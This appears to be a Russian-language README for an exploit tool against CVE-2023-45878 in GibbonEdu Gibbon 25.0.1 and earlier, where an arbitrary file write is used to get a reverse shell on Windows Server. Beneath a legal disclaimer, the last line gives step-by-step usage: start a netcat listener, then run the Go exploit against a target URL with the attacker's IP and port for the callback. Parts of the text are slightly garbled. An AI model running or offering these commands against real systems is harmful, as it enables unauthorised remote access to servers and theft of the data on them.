
CVE-2023-45878 простой эксплойт | обратная оболочка
GibbonEdu Gibbon версия 25.0.1 и ранее позволяет произвольную запись файлов
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Данный эксплойт предоставляется только в образовательных и исследовательских целях. Несанкционированное использование этого кода против систем без явного разрешения незаконно и может нарушать законы о киберпреступности в различных юрисдикциях. Я не несу ответственности за любое неправомерное использование или ущерб, причиненный этим эксплойтом.
Пользователь несет ответственность за соблюдение всех применимых законов и этических норм перед выполнением этого кода. Не используйте этот эксплойт для вредоносных действий.
Этот эксплойт работает исключительно на Windows Server. Если уязвимая версия Gibbon работает на сервере , вам потребуется соответствующим образом изменить эксплойт.
Linuxnc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> или ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>